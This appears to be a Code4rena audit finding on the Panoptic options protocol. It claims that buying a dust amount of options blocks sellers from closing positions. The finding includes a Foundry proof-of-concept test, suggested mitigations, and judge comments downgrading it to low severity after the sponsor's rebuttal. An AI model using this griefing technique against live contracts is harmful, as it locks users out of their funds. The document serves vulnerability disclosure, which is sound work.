Malicious users will purchase dust amount of options to prevent option sellers from burning their options

[c4-bot-10]

Lines of code

https://github.com/code-423n4/2024-04-panoptic/blob/833312ebd600665b577fbd9c03ffa0daf250ed24/contracts/SemiFungiblePositionManager.sol#L999-L1035
https://github.com/code-423n4/2024-04-panoptic/blob/833312ebd600665b577fbd9c03ffa0daf250ed24/contracts/PanopticPool.sol#L836-L847

Vulnerability details

Impact

Option sellers won't be able to close short positions because of existing dust amount of buy, thus might cause a few issues:

1. Notional amount of tokens can't be withdrawn back to the pool.
2. Option sellers are not be able to withdraw their deposits from the pool.

Proof of Concept

PanopticPool contract only allows option sellers to burn entire position size of an option.
By using feature/vulnerability, malicious users can buy dust amount of options to prevent option sellers from closing their positions.

Here's a PoC written in Foundry that shows an option seller not being able to close position:

function test_Audit_dosBurn(
    uint256 x,
    uint256 widthSeed,
    int256 strikeSeed,
    uint256 positionSizeSeed
) public {
    // Prepare pool
        _initPool(x);
    (int24 width, int24 strike) = PositionUtils.getOTMSW(
        widthSeed,
        strikeSeed,
        uint24(tickSpacing),
        currentTick,
        0
    );
    populatePositionData(width, strike, positionSizeSeed);

    // Create a short position
    TokenId shortTokenId = TokenId.wrap(0).addPoolId(poolId).addLeg(0, 1, isWETH, 0, 0, 0, strike, width);
    TokenId[] memory posIdList = new TokenId[](1);
    posIdList[0] = shortTokenId;
    // Bob sells positionSize amount of options
    vm.startPrank(Bob);
    pp.mintOptions(posIdList, positionSize, 0, 0, 0);

    // Create a buy position
    TokenId longTokenId = TokenId.wrap(0).addPoolId(poolId).addLeg(0, 1, isWETH, 1, 0, 0, strike, width);
    posIdList[0] = longTokenId;
    // Malicious Alice buys dust amount of options, e.g 1e4
    vm.startPrank(Alice);
    pp.mintOptions(posIdList, 1e4, type(uint64).max - 1, 0, 0);

    // Later, Bob tries to burn the position, but not able to burn it
    vm.startPrank(Bob);
    vm.expectRevert();
    pp.burnOptions(shortTokenId, new TokenId[](0), 0, 0);
}

Tools Used

Manual Review, Foundry

Recommended Mitigation Steps

Option sellers should be able to close partial amount of their positions.
Or, only allow to buy meaningful minimum amount of options.

Assessed type

DoS

[c4-judge]

Picodes marked the issue as primary issue

[dyedm1]

Options sellers can force exercise buyers if they are out-of-range, and they can also sell a smaller position in the same chunk if they want to close their position and it is truly a "dust" amount purchased.

[c4-judge]

Picodes changed the severity to QA (Quality Assurance)

[Picodes]

Downgrading to Low following the sponsor's answer

[c4-judge]

Picodes marked the issue as grade-c

[c4-judge]

Picodes marked the issue as grade-b